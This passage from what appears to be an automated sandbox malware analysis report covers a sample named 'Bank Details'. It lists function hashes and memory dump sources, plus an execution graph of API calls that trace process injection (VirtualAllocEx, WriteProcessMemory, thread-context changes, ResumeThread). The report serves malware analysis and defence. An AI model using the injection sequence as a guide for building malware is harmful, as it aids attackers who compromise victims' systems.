                                                            • Opcode Fuzzy Hash: 308430a61f149207879880dc1295fa723dce904ca59c7d6021227a9c9aaa12a2
                                                            • Instruction Fuzzy Hash: 4981AF74B112189BDB18AF7598542BE7BB7BFC8700F45852EE602E7288CE39DC128791
                                                            Function 086AF6A8 Relevance: 5.2, Strings: 4, Instructions: 187COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1720083276.00000000086A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_86a0000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@$B$B
                                                            • API String ID: 0-685577651
                                                            • Opcode ID: 6b4b5d67154253dea3b036623f015c923c89b28d1f3a9555d33eff5fd75f9fd3
                                                            • Instruction ID: 2800b66fef0cd62e1edc60dd50c2605f0aa5ce3a7e0abf9ee26f3ba96c8a9920
                                                            • Opcode Fuzzy Hash: 6b4b5d67154253dea3b036623f015c923c89b28d1f3a9555d33eff5fd75f9fd3
                                                            • Instruction Fuzzy Hash: CA51B075B006058FC714CF78D880A6AB7F6FF89222725856AD51ACB760DB31EC46CF91
                                                            Function 086AF6A3 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1720083276.00000000086A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_86a0000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@$B$B
                                                            • API String ID: 0-685577651
                                                            • Opcode ID: f8d626d512783fdbbbed064871f10592ac6467ee87af225b5f46c1e4f771575b
                                                            • Instruction ID: 95c49c455ebae5c5c217f286e4ee6a48a401eb484d3965d710419423a145979a
                                                            • Opcode Fuzzy Hash: f8d626d512783fdbbbed064871f10592ac6467ee87af225b5f46c1e4f771575b
                                                            • Instruction Fuzzy Hash: DD218E75A00A168F8B14CF6DD9848AEBBF5EF48216726416AE606DB331DB30DD41CF82
                                                            Function 086AF698 Relevance: 5.1, Strings: 4, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1720083276.00000000086A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_86a0000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@$B$B
                                                            • API String ID: 0-685577651
                                                            • Opcode ID: 848b398e79e0d8419966c5cc8029bc486a5433eaa82b39eb975615ca985c7a1d
                                                            • Instruction ID: 7f71585fecda6cb2d0035f1dae3ef8af1ef2c7fe15e47501b6156f6f0504f62b
                                                            • Opcode Fuzzy Hash: 848b398e79e0d8419966c5cc8029bc486a5433eaa82b39eb975615ca985c7a1d
                                                            • Instruction Fuzzy Hash: 8B219F76B00A168FCB15CF6DD88486ABBF5EF89216716416AE602CB371DB31DD41CF82

                                                            Execution Graph

                                                            Execution Coverage:21.7%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0.9%
                                                            Total number of Nodes:318
                                                            Total number of Limit Nodes:28
                                                            execution_graph 72422 a85cb20 72423 a85cb60 VirtualAllocEx 72422->72423 72425 a85cb9d 72423->72425 72639 a855ae0 72640 a855a6e 72639->72640 72641 a855aea 72639->72641 72642 a855f51 72641->72642 72657 a858087 72641->72657 72661 a85823b 72641->72661 72665 a858119 72641->72665 72669 a8584f8 72641->72669 72673 a8580dd 72641->72673 72677 a858039 72641->72677 72681 a858272 72641->72681 72685 a858152 72641->72685 72689 a85828a 72641->72689 72693 a857ff0 72641->72693 72697 a8581e3 72641->72697 72701 a8581ab 72641->72701 72705 a8582c1 72641->72705 72709 a8580c0 72641->72709 72658 a8580ac 72657->72658 72659 a8580bb 72658->72659 72713 a85a880 72658->72713 72659->72641 72663 a858260 72661->72663 72662 a85826d 72662->72641 72663->72662 72664 a85a880 CreateProcessAsUserW 72663->72664 72664->72663 72667 a85813e 72665->72667 72666 a85814d 72666->72641 72667->72666 72668 a85a880 CreateProcessAsUserW 72667->72668 72668->72667 72671 a85851f 72669->72671 72670 a8586d9 72670->72641 72671->72670 72672 a85a880 CreateProcessAsUserW 72671->72672 72672->72671 72674 a8580bb 72673->72674 72675 a858099 72673->72675 72674->72641 72675->72674 72676 a85a880 CreateProcessAsUserW 72675->72676 72676->72675 72678 a857ffe 72677->72678 72679 a857ff5 72677->72679 72678->72641 72679->72678 72680 a85a880 CreateProcessAsUserW 72679->72680 72680->72679 72683 a85827c 72681->72683 72682 a858284 72682->72641 72683->72682 72684 a85a880 CreateProcessAsUserW 72683->72684 72684->72683 72687 a85815c 72685->72687 72686 a858167 72686->72641 72687->72686 72688 a85a880 CreateProcessAsUserW 72687->72688 72688->72687 72691 a8582af 72689->72691 72690 a8582bc 72690->72641 72691->72690 72692 a85a880 CreateProcessAsUserW 72691->72692 72692->72691 72695 a857ff5 72693->72695 72694 a857ffe 72694->72641 72695->72694 72696 a85a880 CreateProcessAsUserW 72695->72696 72696->72695 72699 a8581ed 72697->72699 72698 a8581f8 72698->72641 72699->72698 72700 a85a880 CreateProcessAsUserW 72699->72700 72700->72699 72702 a8581d0 72701->72702 72703 a8581de 72702->72703 72704 a85a880 CreateProcessAsUserW 72702->72704 72703->72641 72704->72702 72706 a8582cb 72705->72706 72707 a8582d3 72706->72707 72708 a85a880 CreateProcessAsUserW 72706->72708 72707->72641 72708->72706 72711 a8580ca 72709->72711 72710 a8580d5 72710->72641 72711->72710 72712 a85a880 CreateProcessAsUserW 72711->72712 72712->72711 72714 a85a8ff CreateProcessAsUserW 72713->72714 72716 a85aa00 72714->72716 72717 a85ce60 72718 a85cea8 WriteProcessMemory 72717->72718 72720 a85ceff 72718->72720 72721 67d8298 72722 67d82a7 72721->72722 72725 67d837f 72721->72725 72734 67d8390 72721->72734 72726 67d8383 72725->72726 72727 67d832b 72725->72727 72728 67d83c4 72726->72728 72742 67d8618 72726->72742 72746 67d8628 72726->72746 72727->72722 72728->72722 72729 67d85c8 GetModuleHandleW 72731 67d85f5 72729->72731 72730 67d83bc 72730->72728 72730->72729 72731->72722 72735 67d83a1 72734->72735 72736 67d83c4 72734->72736 72735->72736 72740 67d8628 LoadLibraryExW 72735->72740 72741 67d8618 LoadLibraryExW 72735->72741 72736->72722 72737 67d85c8 GetModuleHandleW 72739 67d85f5 72737->72739 72738 67d83bc 72738->72736 72738->72737 72739->72722 72740->72738 72741->72738 72743 67d8628 72742->72743 72745 67d8661 72743->72745 72750 67d7758 72743->72750 72745->72730 72747 67d863c 72746->72747 72748 67d8661 72747->72748 72749 67d7758 LoadLibraryExW 72747->72749 72748->72730 72749->72748 72751 67d8808 LoadLibraryExW 72750->72751 72753 67d8881 72751->72753 72753->72745 72754 a85dce0 72755 a85dd20 ResumeThread 72754->72755 72757 a85dd51 72755->72757 72578 154d01c 72579 154d034 72578->72579 72580 154d08e 72579->72580 72585 67dcd8c 72579->72585 72591 67dfb98 72579->72591 72597 67dee48 72579->72597 72601 67dee38 72579->72601 72586 67dcd97 72585->72586 72587 67dfc07 72586->72587 72605 67dfd30 72586->72605 72610 67dfd20 72586->72610 72615 67dfdd9 72586->72615 72587->72587 72592 67dfbd5 72591->72592 72593 67dfc07 72592->72593 72594 67dfdd9 2 API calls 72592->72594 72595 67dfd30 2 API calls 72592->72595 72596 67dfd20 2 API calls 72592->72596 72594->72593 72595->72593 72596->72593 72598 67dee6e 72597->72598 72599 67dcd8c 2 API calls 72598->72599 72600 67dee8f 72599->72600 72600->72580 72602 67dee48 72601->72602 72603 67dcd8c 2 API calls 72602->72603 72604 67dee8f 72603->72604 72604->72580 72607 67dfd44 72605->72607 72606 67dfdd0 72606->72587 72608 67dfdd9 2 API calls 72607->72608 72623 67dfde8 72607->72623 72608->72606 72612 67dfd30 72610->72612 72611 67dfdd0 72611->72587 72613 67dfdd9 2 API calls 72612->72613 72614 67dfde8 2 API calls 72612->72614 72613->72611 72614->72611 72616 67dfdb0 72615->72616 72617 67dfde2 72615->72617 72619 67dfdd9 2 API calls 72616->72619 72620 67dfde8 2 API calls 72616->72620 72621 67dfdf9 72617->72621 72622 68d0c42 2 API calls 72617->72622 72618 67dfdd0 72618->72587 72619->72618 72620->72618 72621->72587 72622->72621 72624 67dfdf9 72623->72624 72626 68d0c42 72623->72626 72624->72606 72630 68d0c70 72626->72630 72634 68d0c60 72626->72634 72627 68d0c5a 72627->72624 72631 68d0cb2 72630->72631 72633 68d0cb9 72630->72633 72632 68d0d0a CallWindowProcW 72631->72632 72631->72633 72632->72633 72633->72627 72635 68d0bfa 72634->72635 72636 68d0c6f 72634->72636 72635->72627 72637 68d0d0a CallWindowProcW 72636->72637 72638 68d0cb9 72636->72638 72637->72638 72638->72627 72374 67dac70 DuplicateHandle 72375 67dad06 72374->72375 72376 7da9b48 72377 7da9b5c 72376->72377 72378 7da9bd5 72377->72378 72386 a85130b 72377->72386 72390 a851f9d 72377->72390 72394 a8514bd 72377->72394 72398 a851db7 72377->72398 72402 a851622 72377->72402 72406 a852d47 72377->72406 72410 a851e0c 72377->72410 72414 a853268 72386->72414 72417 a853260 72386->72417 72387 a85131c 72392 a853260 VirtualProtect 72390->72392 72393 a853268 VirtualProtect 72390->72393 72391 a851fb7 72392->72391 72393->72391 72396 a853260 VirtualProtect 72394->72396 72397 a853268 VirtualProtect 72394->72397 72395 a8514e1 72396->72395 72397->72395 72400 a853260 VirtualProtect 72398->72400 72401 a853268 VirtualProtect 72398->72401 72399 a851dcb 72400->72399 72401->72399 72404 a853260 VirtualProtect 72402->72404 72405 a853268 VirtualProtect 72402->72405 72403 a851633 72404->72403 72405->72403 72408 a853260 VirtualProtect 72406->72408 72409 a853268 VirtualProtect 72406->72409 72407 a852d58 72408->72407 72409->72407 72412 a853260 VirtualProtect 72410->72412 72413 a853268 VirtualProtect 72410->72413 72411 a851e4a 72412->72411 72413->72411 72415 a8532b0 VirtualProtect 72414->72415 72416 a8532ea 72415->72416 72416->72387 72418 a853263 VirtualProtect 72417->72418 72419 a85323c 72417->72419 72421 a8532ea 72418->72421 72419->72387 72421->72387 72426 a85d5b0 72427 a85d5f8 VirtualProtectEx 72426->72427 72429 a85d636 72427->72429 72430 7d19368 72431 7d193ae DeleteFileW 72430->72431 72433 7d193e7 72431->72433 72434 7daabe0 72435 7daac28 VirtualProtect 72434->72435 72436 7daac62 72435->72436 72437 67d0040 72438 67d0065 72437->72438 72442 67d28a7 72438->72442 72447 67d28c8 72438->72447 72439 67d0076 72443 67d28c8 72442->72443 72452 67d29c8 72443->72452 72458 67d29b7 72443->72458 72444 67d294d 72444->72439 72448 67d28e9 72447->72448 72450 67d29c8 CreateWindowExW 72448->72450 72451 67d29b7 CreateWindowExW 72448->72451 72449 67d294d 72449->72439 72450->72449 72451->72449 72453 67d29e9 72452->72453 72464 67d2a51 72453->72464 72470 67d2a70 72453->72470 72475 67d2a80 72453->72475 72454 67d2a22 72454->72444 72459 67d29c8 72458->72459 72461 67d2a51 CreateWindowExW 72459->72461 72462 67d2a70 CreateWindowExW 72459->72462 72463 67d2a80 CreateWindowExW 72459->72463 72460 67d2a22 72460->72444 72461->72460 72462->72460 72463->72460 72465 67d2a5a 72464->72465 72466 67d2a96 72464->72466 72465->72454 72480 67d5970 72466->72480 72485 67d5961 72466->72485 72467 67d2b34 72467->72454 72471 67d2a80 72470->72471 72473 67d5961 CreateWindowExW 72471->72473 72474 67d5970 CreateWindowExW 72471->72474 72472 67d2b34 72472->72454 72473->72472 72474->72472 72476 67d2ab3 72475->72476 72478 67d5961 CreateWindowExW 72476->72478 72479 67d5970 CreateWindowExW 72476->72479 72477 67d2b34 72477->72454 72478->72477 72479->72477 72482 67d599b 72480->72482 72481 67d5c61 72481->72467 72482->72481 72490 67da349 72482->72490 72496 67da358 72482->72496 72486 67d599b 72485->72486 72487 67d5c61 72486->72487 72488 67da349 CreateWindowExW 72486->72488 72489 67da358 CreateWindowExW 72486->72489 72487->72467 72488->72487 72489->72487 72491 67da33f 72490->72491 72492 67da356 72490->72492 72491->72481 72493 67da39d 72492->72493 72501 67da502 72492->72501 72505 67da508 72492->72505 72493->72481 72497 67da379 72496->72497 72498 67da39d 72497->72498 72499 67da508 CreateWindowExW 72497->72499 72500 67da502 CreateWindowExW 72497->72500 72498->72481 72499->72498 72500->72498 72502 67da515 72501->72502 72503 67da54f 72502->72503 72509 67d9090 72502->72509 72503->72493 72506 67da515 72505->72506 72507 67da54f 72506->72507 72508 67d9090 CreateWindowExW 72506->72508 72507->72493 72508->72507 72510 67d909b 72509->72510 72512 67db268 72510->72512 72513 67da894 72510->72513 72512->72512 72514 67da89f 72513->72514 72518 67dd020 72514->72518 72524 67dd030 72514->72524 72515 67db311 72515->72512 72520 67dd162 72518->72520 72521 67dd061 72518->72521 72519 67dd06d 72519->72515 72520->72515 72521->72519 72530 67ddd60 72521->72530 72534 67ddd4f 72521->72534 72526 67dd162 72524->72526 72527 67dd061 72524->72527 72525 67dd06d 72525->72515 72526->72515 72527->72525 72528 67ddd4f CreateWindowExW 72527->72528 72529 67ddd60 CreateWindowExW 72527->72529 72528->72526 72529->72526 72531 67ddd8b 72530->72531 72532 67dde3a 72531->72532 72533 67dec3a CreateWindowExW 72531->72533 72532->72532 72533->72532 72535 67ddd60 72534->72535 72536 67dde3a 72535->72536 72537 67dec3a CreateWindowExW 72535->72537 72537->72536 72538 a85c438 72539 a85c47d Wow64GetThreadContext 72538->72539 72541 a85c4c5 72539->72541 72758 68d5ef0 72759 68d5ef2 72758->72759 72760 67d5961 CreateWindowExW 72759->72760 72761 68d5f12 72759->72761 72762 67d5970 CreateWindowExW 72759->72762 72760->72761 72762->72761 72763 a85da78 72764 a85dabd Wow64SetThreadContext 72763->72764 72766 a85db05 72764->72766 72542 67d0fc2 72543 67d0fd2 72542->72543 72544 67d19aa 72543->72544 72549 68de7e9 72543->72549 72554 68de870 72543->72554 72558 82016ab 72543->72558 72564 82016b8 72543->72564 72550 68de7ec 72549->72550 72551 68de7f6 72550->72551 72552 67d5961 CreateWindowExW 72550->72552 72553 67d5970 CreateWindowExW 72550->72553 72551->72543 72552->72551 72553->72551 72555 68de883 72554->72555 72556 67d5961 CreateWindowExW 72554->72556 72557 67d5970 CreateWindowExW 72554->72557 72555->72543 72556->72555 72557->72555 72559 82016b3 72558->72559 72560 820172c 72558->72560 72568 82016f8 72559->72568 72573 82016e8 72559->72573 72561 82016d7 72561->72543 72565 82016d7 72564->72565 72566 82016e8 CreateWindowExW 72564->72566 72567 82016f8 CreateWindowExW 72564->72567 72565->72543 72566->72565 72567->72565 72569 8201726 72568->72569 72571 67d5961 CreateWindowExW 72569->72571 72572 67d5970 CreateWindowExW 72569->72572 72570 820175c 72570->72561 72571->72570 72572->72570 72574 82016eb 72573->72574 72575 820175c 72573->72575 72576 67d5961 CreateWindowExW 72574->72576 72577 67d5970 CreateWindowExW 72574->72577 72575->72561 72576->72575 72577->72575

                                                            Executed Functions

                                                            Function 07D811B3 Relevance: 5.5, Instructions: 5504COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 658 7d811b3-7d811be 659 7d811c0-7d811c4 658->659 660 7d811c5-7d813f7 658->660 659->660 688 7d8345d-7d8370b 660->688 689 7d813fd-7d82110 660->689 756 7d845f0-7d8558a 688->756 757 7d83711-7d845e8 688->757 1088 7d82490-7d83455 689->1088 1089 7d82116-7d82488 689->1089 1318 7d85910-7d85923 756->1318 1319 7d85590-7d85908 756->1319 757->756 1088->688 1089->1088 1323 7d85929-7d85f5d 1318->1323 1324 7d85f65-7d86df7 1318->1324 1319->1318 1323->1324 1707 7d86df7 call 7d889ab 1324->1707 1708 7d86df7 call 7d8897d 1324->1708 1705 7d86dfd-7d86e04 1707->1705 1708->1705
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3844826033.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_7d80000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1efb1e70b97f175d31bc5533ed45db23c1057b02c2d1909eda32990352bd0d53
                                                            • Instruction ID: 68e6357c3ade02ce9be852f8156c138e5ece9fdab938a5faf55d6cbd5ffe9899
                                                            • Opcode Fuzzy Hash: 1efb1e70b97f175d31bc5533ed45db23c1057b02c2d1909eda32990352bd0d53
                                                            • Instruction Fuzzy Hash: 88B33770A112288BCB58EF78E99966CBBB2FF89310F1085E9D049A3350DF385E94DF51
                                                            Function 07D811C0 Relevance: 5.5, Instructions: 5499COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1709 7d811c0-7d813f7 1738 7d8345d-7d8370b 1709->1738 1739 7d813fd-7d82110 1709->1739 1806 7d845f0-7d8558a 1738->1806 1807 7d83711-7d845e8 1738->1807 2138 7d82490-7d83455 1739->2138 2139 7d82116-7d82488 1739->2139 2368 7d85910-7d85923 1806->2368 2369 7d85590-7d85908 1806->2369 1807->1806 2138->1738 2139->2138 2373 7d85929-7d85f5d 2368->2373 2374 7d85f65-7d86df7 2368->2374 2369->2368 2373->2374 2757 7d86df7 call 7d889ab 2374->2757 2758 7d86df7 call 7d8897d 2374->2758 2755 7d86dfd-7d86e04 2757->2755 2758->2755
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3844826033.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_7d80000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 96f2732b6add98d9d58a77e618e32bed0d170e779d33b71b8afd9b4731ecfd79
                                                            • Instruction ID: c87fdc683913a7b13515adca8318271f53e95da995e58b1879040e3b88067344
                                                            • Opcode Fuzzy Hash: 96f2732b6add98d9d58a77e618e32bed0d170e779d33b71b8afd9b4731ecfd79
                                                            • Instruction Fuzzy Hash: EDB33770A112288BCB58EF78E99966CBBB2FF89310F1085E9D049A3350DF385E94DF55
                                                            Function 0172A140 Relevance: .4, Instructions: 357COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3823951878.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_1720000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 10cb692321342dd4dd8d08e3ee1b3e7b97e6f7aee3d6cb72b8f9732c76df2eb0
                                                            • Instruction ID: 60bd12a5c8c651066b43b4e1b546777799511272832d6f2de1fc6544eb9c8685
                                                            • Opcode Fuzzy Hash: 10cb692321342dd4dd8d08e3ee1b3e7b97e6f7aee3d6cb72b8f9732c76df2eb0
                                                            • Instruction Fuzzy Hash: 9BE10874E002188FEB54DFA9D894B9EBBF2BF89310F2480A9D409AB355DB319D46CF51
                                                            Function 067D8390 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 5084 67d8390-67d839f 5085 67d83cb-67d83cf 5084->5085 5086 67d83a1-67d83ae call 67d76f0 5084->5086 5088 67d83d1-67d83db 5085->5088 5089 67d83e3-67d8424 5085->5089 5091 67d83c4 5086->5091 5092 67d83b0 5086->5092 5088->5089 5095 67d8426-67d842e 5089->5095 5096 67d8431-67d843f 5089->5096 5091->5085 5142 67d83b6 call 67d8628 5092->5142 5143 67d83b6 call 67d8618 5092->5143 5095->5096 5097 67d8441-67d8446 5096->5097 5098 67d8463-67d8465 5096->5098 5100 67d8448-67d844f call 67d76fc 5097->5100 5101 67d8451 5097->5101 5103 67d8468-67d846f 5098->5103 5099 67d83bc-67d83be 5099->5091 5102 67d8500-67d851e 5099->5102 5105 67d8453-67d8461 5100->5105 5101->5105 5115 67d8523-67d8579 5102->5115 5106 67d847c-67d8483 5103->5106 5107 67d8471-67d8479 5103->5107 5105->5103 5109 67d8485-67d848d 5106->5109 5110 67d8490-67d8499 call 67d770c 5106->5110 5107->5106 5109->5110 5116 67d849b-67d84a3 5110->5116 5117 67d84a6-67d84ab 5110->5117 5135 67d857b-67d85c0 5115->5135 5116->5117 5118 67d84ad-67d84b4 5117->5118 5119 67d84c9-67d84cd 5117->5119 5118->5119 5120 67d84b6-67d84c6 call 67d771c call 67d772c 5118->5120 5144 67d84d0 call 67d8928 5119->5144 5145 67d84d0 call 67d8918 5119->5145 5120->5119 5123 67d84d3-67d84d6 5126 67d84f9-67d84ff 5123->5126 5127 67d84d8-67d84f6 5123->5127 5127->5126 5137 67d85c8-67d85f3 GetModuleHandleW 5135->5137 5138 67d85c2-67d85c5 5135->5138 5139 67d85fc-67d8610 5137->5139 5140 67d85f5-67d85fb 5137->5140 5138->5137 5140->5139 5142->5099 5143->5099 5144->5123 5145->5123
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 067D85E6
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3843659867.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_67d0000_udo.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: fbee2a5e682c0ac96edd8f17e4de883501393fa36e9dddce0090bb06d2decadb
                                                            • Instruction ID: 6d2ca8294236b5cc877c3f19f45b2075bdcd809bb6043a8500416efa2942db73
                                                            • Opcode Fuzzy Hash: fbee2a5e682c0ac96edd8f17e4de883501393fa36e9dddce0090bb06d2decadb
                                                            • Instruction Fuzzy Hash: 12716970A00B059FD7A4DF2AD4447AABBF5FF88214F008D2ED48ADBA50DB74E845CB95
                                                            Function 067DEC3A Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3843659867.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_67d0000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0dc071ef743e2e94439b735dd6ce103c3514ab57c31b510c119d8a9969384564
                                                            • Instruction ID: a16641e37286ec381ad0ce19f4737e2d99b102e2432d3cf10ca713ca9db04032
                                                            • Opcode Fuzzy Hash: 0dc071ef743e2e94439b735dd6ce103c3514ab57c31b510c119d8a9969384564
                                                            • Instruction Fuzzy Hash: 10510271C00249AFDF16CF99C984ADEBFB6BF49310F24816AE808AB221D7759845CF90
                                                            Function 07DAAB27 Relevance: 1.6, APIs: 1, Instructions: 126memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07DAAC53
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3844985334.0000000007DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_7da0000_udo.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 9e0219160855b4e1c77b2794edb0296ff3538ddcb6ce19d99af681a399667565
                                                            • Instruction ID: d1598d328ab50bb6e4152cc01afa231f9b11a1caf8fdfea543d33d4e7e47926c
                                                            • Opcode Fuzzy Hash: 9e0219160855b4e1c77b2794edb0296ff3538ddcb6ce19d99af681a399667565
                                                            • Instruction Fuzzy Hash: E1418971808346DFDB51CFAEC4446CAFBB4FF09328F24806AD498A7611DB3859A4CFA5
                                                            Function 067DEC84 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 067DEDA2
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3843659867.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_67d0000_udo.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: 04e08157661be1164be93faa6f19b6a464118466a3fa9873e70dbcf6c8f75957
                                                            • Instruction ID: b0a79790dccca91b7d8db345343c5686b8e464daeb4050124b98b278728772ce
                                                            • Opcode Fuzzy Hash: 04e08157661be1164be93faa6f19b6a464118466a3fa9873e70dbcf6c8f75957
                                                            • Instruction Fuzzy Hash: 5451E0B1D003089FDF15CFAAC984ADEBFB5BF88310F24852AE818AB210D7749845CF94
                                                            Function 067DEC90 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 067DEDA2
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3843659867.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_67d0000_udo.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: fad3e48de2e810868ed6facf411a0603bc2f7b5b9e13d172e81d63b2b21e78ba
                                                            • Instruction ID: 9a39c257bc787e9eb2f0ad699b2ba88dfca0427e8ceb9e18de524f7c1fea1f20
                                                            • Opcode Fuzzy Hash: fad3e48de2e810868ed6facf411a0603bc2f7b5b9e13d172e81d63b2b21e78ba
                                                            • Instruction Fuzzy Hash: 2941C0B1D003089FDB15CFAAC884ADEBFB5BF88310F24852AE818AB210D7759845CF94
                                                            Function 068D0C70 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 068D0D31
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3843729089.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_68d0000_udo.jbxd
                                                            Similarity
                                                            • API ID: CallProcWindow
                                                            • String ID:
                                                            • API String ID: 2714655100-0
                                                            • Opcode ID: ebbb64683552dfb0b40fc4672bf40a9d6aa1a4b4e464ba0e2eecc050e042e2c1
                                                            • Instruction ID: 91a3b39002ca85179db3f8d63409a44ab1195f07eebd6d540df737b2f7af8904
                                                            • Opcode Fuzzy Hash: ebbb64683552dfb0b40fc4672bf40a9d6aa1a4b4e464ba0e2eecc050e042e2c1
                                                            • Instruction Fuzzy Hash: 2A4103B59003098FDB54CF99C848AAABBF6FB88314F24C559E519AB321D774A841CBA0
                                                            Function 067DAC69 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 067DACF7
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3843659867.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_67d0000_udo.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 8d4ffde5e10497bff3a753abbb1d8ed86e6de5293b3fa64d20257fd7f44fdd09
                                                            • Instruction ID: 051681eafd0bf75cd0523480cf69643ee256e605fff6aae88ae6222708ed3432
                                                            • Opcode Fuzzy Hash: 8d4ffde5e10497bff3a753abbb1d8ed86e6de5293b3fa64d20257fd7f44fdd09
                                                            • Instruction Fuzzy Hash: 4521E4B5D002489FDB10CFAAD984AEEBBF4FB48310F15842AE958A7350D378A940CF65
                                                            Function 067DAC70 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 067DACF7
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3843659867.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_67d0000_udo.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 113412a98c18f1ed09abc586a7ca4b26a3932e79ab04f9d70ccded5e36c72698
                                                            • Instruction ID: 900f2582992cf0b0e5fef0c6e63e158b726aacf612e439964c94376284563adb
                                                            • Opcode Fuzzy Hash: 113412a98c18f1ed09abc586a7ca4b26a3932e79ab04f9d70ccded5e36c72698
